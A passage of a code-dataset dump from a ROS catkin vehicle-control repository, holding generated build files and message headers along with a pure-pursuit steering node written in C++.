\"... zf_msgs_generate_messages_nodejs\"\n\t@echo \"... install/local\"\n\t@echo \"... _catkin_empty_exported_target\"\n\t@echo \"... zf_msgs_gennodejs\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7686375379562378,
"alphanum_fraction": 0.7969151735305786,
"avg_line_length": 31.41666603088379,
"blob_id": "0e30ba38f2c253f10b9faaa779d4e6689dbe3d63",
"content_id": "03a199de2d8735e95c060550a2443251003bbfb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 389,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 12,
"path": "/build/CTestTestfile.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMake generated Testfile for \n# Source directory: /home/zf/xuechong_ws/zhuifengShow0919/src\n# Build directory: /home/zf/xuechong_ws/zhuifengShow0919/build\n# \n# This file includes the relevant testing commands required for \n# testing this directory and lists subdirectories to be tested as well.\nsubdirs(gtest)\nsubdirs(zf_msgs)\nsubdirs(path)\nsubdirs(pos320)\nsubdirs(steer)\nsubdirs(zfmsg)\n"
},
{
"alpha_fraction": 0.654236376285553,
"alphanum_fraction": 0.6679404377937317,
"avg_line_length": 26.007118225097656,
"blob_id": "b981119c5272b5715532bcec583297263e529d0c",
"content_id": "9d548202b5fc05a2a762b37dc7dcc87f54cb2f18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7589,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 281,
"path": "/devel/include/zfmsg/BreakStatus.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/BreakStatus.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_BREAKSTATUS_H\n#define ZFMSG_MESSAGE_BREAKSTATUS_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct BreakStatus_\n{\n typedef BreakStatus_<ContainerAllocator> Type;\n\n BreakStatus_()\n : header()\n , ts(0)\n , controlMode(0)\n , pressure(0.0)\n , speed(0.0)\n , targetPressure(0.0)\n , targetSpeed(0.0)\n , pedalBreak(0)\n , errorCode(0) {\n }\n BreakStatus_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , controlMode(0)\n , pressure(0.0)\n , speed(0.0)\n , targetPressure(0.0)\n , targetSpeed(0.0)\n , pedalBreak(0)\n , errorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _pressure_type;\n _pressure_type pressure;\n\n typedef float _speed_type;\n _speed_type speed;\n\n typedef float _targetPressure_type;\n _targetPressure_type targetPressure;\n\n typedef float _targetSpeed_type;\n _targetSpeed_type targetSpeed;\n\n typedef uint8_t _pedalBreak_type;\n _pedalBreak_type pedalBreak;\n\n typedef uint8_t _errorCode_type;\n _errorCode_type errorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::BreakStatus_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zfmsg::BreakStatus_<ContainerAllocator> const> ConstPtr;\n\n}; // struct BreakStatus_\n\ntypedef ::zfmsg::BreakStatus_<std::allocator<void> > BreakStatus;\n\ntypedef boost::shared_ptr< ::zfmsg::BreakStatus > BreakStatusPtr;\ntypedef boost::shared_ptr< ::zfmsg::BreakStatus const> BreakStatusConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::BreakStatus_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::BreakStatus_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! ['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::BreakStatus_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::BreakStatus_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::BreakStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::BreakStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::BreakStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::BreakStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"9f94464581d3b80147ade7f255eccdd3\";\n }\n\n static const char* value(const ::zfmsg::BreakStatus_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x9f94464581d3b801ULL;\n static const uint64_t static_value2 = 0x47ade7f255eccdd3ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/BreakStatus\";\n }\n\n static const char* value(const ::zfmsg::BreakStatus_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nuint8 controlMode\\n\\\nfloat32 pressure\\n\\\nfloat32 speed\\n\\\nfloat32 targetPressure\\n\\\nfloat32 targetSpeed\\n\\\nuint8 pedalBreak\\n\\\nuint8 errorCode\\n\\\n\\n\\\n\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::BreakStatus_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::BreakStatus_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.controlMode);\n stream.next(m.pressure);\n stream.next(m.speed);\n stream.next(m.targetPressure);\n stream.next(m.targetSpeed);\n stream.next(m.pedalBreak);\n stream.next(m.errorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct BreakStatus_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::BreakStatus_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"pressure: \";\n Printer<float>::stream(s, indent + \" \", v.pressure);\n s << indent << \"speed: \";\n Printer<float>::stream(s, indent + \" \", v.speed);\n s << indent << \"targetPressure: \";\n Printer<float>::stream(s, indent + \" \", v.targetPressure);\n s << indent << \"targetSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.targetSpeed);\n s << indent << \"pedalBreak: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.pedalBreak);\n s << indent << \"errorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.errorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_BREAKSTATUS_H\n"
},
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7170370221138,
"avg_line_length": 41.25,
"blob_id": "912a115893b330769ba4ae0701c24b0aec65d184",
"content_id": "101e1b1c17da182543a3eab4664b2886a318a781",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 675,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 16,
"path": "/build/path/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"path\")\nset(path_VERSION \"0.1.0\")\nset(path_MAINTAINER \"Your Name <[email protected]>\")\nset(path_PACKAGE_FORMAT \"2\")\nset(path_BUILD_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(path_BUILD_EXPORT_DEPENDS )\nset(path_BUILDTOOL_DEPENDS \"catkin\")\nset(path_BUILDTOOL_EXPORT_DEPENDS )\nset(path_EXEC_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(path_RUN_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(path_TEST_DEPENDS )\nset(path_DOC_DEPENDS )\nset(path_URL_WEBSITE \"http://wiki.ros.org/path\")\nset(path_URL_BUGTRACKER \"\")\nset(path_URL_REPOSITORY \"\")\nset(path_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.6324324607849121,
"alphanum_fraction": 0.654826283454895,
"avg_line_length": 26.553192138671875,
"blob_id": "9f1a1c633fd15c32c9ebdd93dfc3ad86eae8e87d",
"content_id": "ead18ddeaee61e41a7e8cffadf145cc70d6a37ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3885,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 141,
"path": "/src/steer/src/pure_pursuit.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"zf_msgs/pos320.h\"\n#include \"zf_msgs/pose2dArray.h\"\n#include \"std_msgs/String.h\"\n#include \"std_msgs/Float32.h\"\n#include \"std_msgs/Int32.h\"\n#include \"geometry_msgs/TwistStamped.h\"\n#include \"geometry_msgs/PoseStamped.h\"\n#include \"geometry_msgs/Pose.h\"\n#include <cmath>\n\n/**\n * XUECHONG 2018.09.06, pure pursuit path following\n */\n\n/// important parameters, need fine-tuning\nconst int LOOP_RATE_ = 20;\n//wheel base length\nconst double WB = 2;\n//min look ahead distance\n//wheel steer gain\n//const int K_STEER = 100;\nconst double Lfc = 3;\nconst int K_STEER = 550;\nconst int K_DEVIA = 40;\nconst int OFFSET_STEER = -75;\nint getWheelAngle(const double &delta, const double &devia){\n int angle = int(K_STEER * delta + devia * K_DEVIA) + OFFSET_STEER;\n return angle;\n}\n//look ahead distance\ninline double getPreDis(double vel){\n return log(1+vel) + vel*0.8 + Lfc;\n}\n\nbool is_waypoints_set = false;\nbool is_pose_set = false;\n\nzf_msgs::pose2dArray waypoints;\nzf_msgs::pos320 pose;\n\nvoid waypointsCallback(const zf_msgs::pose2dArray msg)\n{\n ///\n ROS_INFO(\"I got waypoints data: \");\n waypoints = msg;\n is_waypoints_set = true;\n}\n\n\nvoid currentPoseCallback(const zf_msgs::pos320 msg)\n{\n ///\n ROS_INFO(\"I got current pose data: \");\n pose = msg;\n is_pose_set = true;\n}\n\nint getTargetPoint(double dis)\n{\n int target = 1;\n double L = 0;\n while(L < dis && target < waypoints.points.size())\n {\n L += ( sqrt( pow( waypoints.points[target].x - waypoints.points[target -1].x ,2) + \n pow( waypoints.points[target].y - waypoints.points[target -1].y, 2) ) );\n ++target;\n }\n return target;\n}\n\nint main(int argc, char **argv)\n{\n ros::init(argc, argv, \"pure_pursuit\");\n\n ros::NodeHandle n;\n\n ros::Subscriber subWaypoints = n.subscribe(\"gps_waypoints\", 1000, waypointsCallback);\n ros::Subscriber subCurrentPose = n.subscribe(\"pos320_pose\", 1000, currentPoseCallback);\n ros::Publisher pubWheelSteer = n.advertise<std_msgs::Int32>(\"/cmd/steer_cmd\",1000);\n //ros::Publisher pubWheelSteer = n.advertise<std_msgs::Int32>(\"pure_pursuit_steer\",1000);\n\n int markPoint = 0;\n int targetPoint = 0;\n double forwardDis = 0;\n double alpha = 0;\n std_msgs::Int32 wheel_steer;\n\n geometry_msgs::TwistStamped wheelMsg;\n\n ROS_INFO_STREAM(\"pure pursuit start\");\n ros::Rate loop_rate(LOOP_RATE_);\n while (ros::ok())\n {\n ros::spinOnce();\n /// check if subscribed data\n /// two selections\n if (!is_waypoints_set || !is_pose_set)\n {\n ROS_WARN(\"Necessary topics are not subscribed yet ... \");\n loop_rate.sleep();\n continue;\n }\n is_pose_set = false;\n is_waypoints_set = false;\n\n if(waypoints.points.size() < 10){\n continue;\n }\n\n /// compute wheel steer\n /// get nearest point and dis\n markPoint = 0;\n targetPoint = 0;\n\n /// get forward dis\n double velocity = std::sqrt( std::pow(pose.v_e,2) + std::pow(pose.v_n,2) + std::pow(pose.v_earth,2));\n forwardDis = getPreDis(velocity);\n ///std::cout<< \"forward dis is : \"<< forwardDis << \"\\n\";\n\n /// get target point \n targetPoint = getTargetPoint(forwardDis);\n std::cout<< \"target point is : \"<< targetPoint << \"\\n\";\n\n /// forward ->y, right-> x\n /// two selections\n //alpha = atan( (waypoints[targetPoint].pose.position.y - waypoints[markPoint].pose.position.y) /(waypoints[targetPoint].pose.position.x - waypoints[markPoint].pose.position.x) );\n alpha = atan( (waypoints.points[targetPoint].x) /(waypoints.points[targetPoint].y) );\n alpha = atan(2.0 * WB * sin(alpha) / forwardDis);\n\n wheel_steer.data = getWheelAngle(alpha, waypoints.points[int(targetPoint/2)].x);\n pubWheelSteer.publish(wheel_steer);\n std::cout << waypoints.points[targetPoint].x << \"\\t\" << waypoints.points[targetPoint].y << \"\\n\\n\";\n std::cout<< wheel_steer.data - OFFSET_STEER << \"\\n\";\n\n loop_rate.sleep();\n }\n\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 27,
"blob_id": "cef3e7f4e7b6bcd9d541a7fbe632121092f9860c",
"content_id": "95df62b4eb8e6c1152cc0ea00591f103035b5343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/build/steer/catkin_generated/steer-msg-extras.cmake.installspace.in",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(steer_MESSAGE_FILES \"\")\nset(steer_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.8103448152542114,
"alphanum_fraction": 0.8103448152542114,
"avg_line_length": 86,
"blob_id": "624eb7ad413cd33b38ce4e1513f824ec21edd729",
"content_id": "021d90c1831e17ff099b2eb00062558d0f23f738",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 174,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 2,
"path": "/build/zfmsg/catkin_generated/installspace/zfmsg-msg-extras.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(zfmsg_MESSAGE_FILES \"msg/SteerStatus.msg;msg/BreakStatus.msg;msg/ThrottleGearStatus.msg;msg/MotionCmd.msg;msg/CanInfo.msg;msg/CanInfoAW.msg\")\nset(zfmsg_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.7609195113182068,
"alphanum_fraction": 0.7885057330131531,
"avg_line_length": 42.5,
"blob_id": "4c998e86b337df7955c274f93bb97ec4075c912c",
"content_id": "38aeaec122fe27d3c1595495bc4dbc6ffca6904d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 10,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zf_msgs/msg/pos320.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zf_msgs/msg/pose2dArray.lisp\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_lisp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.6206896305084229,
"alphanum_fraction": 0.7241379022598267,
"avg_line_length": 28,
"blob_id": "4dc78cde0d8251149717a40905023a101e453881",
"content_id": "00e3ce6b11bc3ca9ac49d62a2d6d54e7cb8cfa91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 2,
"path": "/build/pos320/catkin_generated/pos320-msg-extras.cmake.develspace.in",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(pos320_MESSAGE_FILES \"\")\nset(pos320_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.7604166865348816,
"alphanum_fraction": 0.7604166865348816,
"avg_line_length": 47,
"blob_id": "d8d9ef3aea88b170162e673f2dcf1cf581c03d2e",
"content_id": "572239282ac8cac16761eb1e9dca011176f97f00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 4,
"path": "/build/steer/catkin_generated/installspace/steer-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${steer_DIR}/..\" \"\" steer_MSG_INCLUDE_DIRS UNIQUE)\nset(steer_MSG_DEPENDENCIES std_msgs;geometry_msgs;zf_msgs)\n"
},
{
"alpha_fraction": 0.7052023410797119,
"alphanum_fraction": 0.7572254538536072,
"avg_line_length": 42.25,
"blob_id": "27fa8bdb7bba8b48815fedfe4f07b59734f9567d",
"content_id": "72e755db446f69221e25c337f1a0a6b0dec3f083",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 4,
"path": "/build/pos320/catkin_generated/installspace/pos320-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${pos320_DIR}/..\" \"\" pos320_MSG_INCLUDE_DIRS UNIQUE)\nset(pos320_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7870967984199524,
"alphanum_fraction": 0.7870967984199524,
"avg_line_length": 37.75,
"blob_id": "a4bfb497664c48962bee8588c1f7c80fa2af0bf0",
"content_id": "9c91cb425677cbcf413590c9be37f0495de2a924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 4,
"path": "/devel/share/steer/cmake/steer-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(steer_MSG_INCLUDE_DIRS \"\")\nset(steer_MSG_DEPENDENCIES std_msgs;geometry_msgs;zf_msgs)\n"
},
{
"alpha_fraction": 0.7781495451927185,
"alphanum_fraction": 0.7789216041564941,
"avg_line_length": 31.789030075073242,
"blob_id": "b4eb5151e9103092810e9db8565e95e3c3719912",
"content_id": "45a6ce00e176426568d5fe89b11ee3c1b3c28525",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 7771,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 237,
"path": "/build/steer/cmake/steer-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(WARNING \"Invoking generate_messages() without having added any message or service file before.\nYou should either add add_message_files() and/or add_service_files() calls or remove the invocation of generate_messages().\")\nmessage(STATUS \"steer: 0 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg;-Igeometry_msgs:/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;-Izf_msgs:/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(steer_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(steer\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(steer_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_gencpp)\nadd_dependencies(steer_gencpp steer_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(steer\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(steer_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_geneus)\nadd_dependencies(steer_geneus steer_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(steer\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(steer_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_genlisp)\nadd_dependencies(steer_genlisp steer_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(steer\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(steer_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_gennodejs)\nadd_dependencies(steer_gennodejs steer_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(steer\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(steer_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_py)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_genpy)\nadd_dependencies(steer_genpy steer_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/steer\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(steer_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\nif(TARGET geometry_msgs_generate_messages_cpp)\n add_dependencies(steer_generate_messages_cpp geometry_msgs_generate_messages_cpp)\nendif()\nif(TARGET zf_msgs_generate_messages_cpp)\n add_dependencies(steer_generate_messages_cpp zf_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/steer\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(steer_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\nif(TARGET geometry_msgs_generate_messages_eus)\n add_dependencies(steer_generate_messages_eus geometry_msgs_generate_messages_eus)\nendif()\nif(TARGET zf_msgs_generate_messages_eus)\n add_dependencies(steer_generate_messages_eus zf_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/steer\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(steer_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\nif(TARGET geometry_msgs_generate_messages_lisp)\n add_dependencies(steer_generate_messages_lisp geometry_msgs_generate_messages_lisp)\nendif()\nif(TARGET zf_msgs_generate_messages_lisp)\n add_dependencies(steer_generate_messages_lisp zf_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/steer\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n 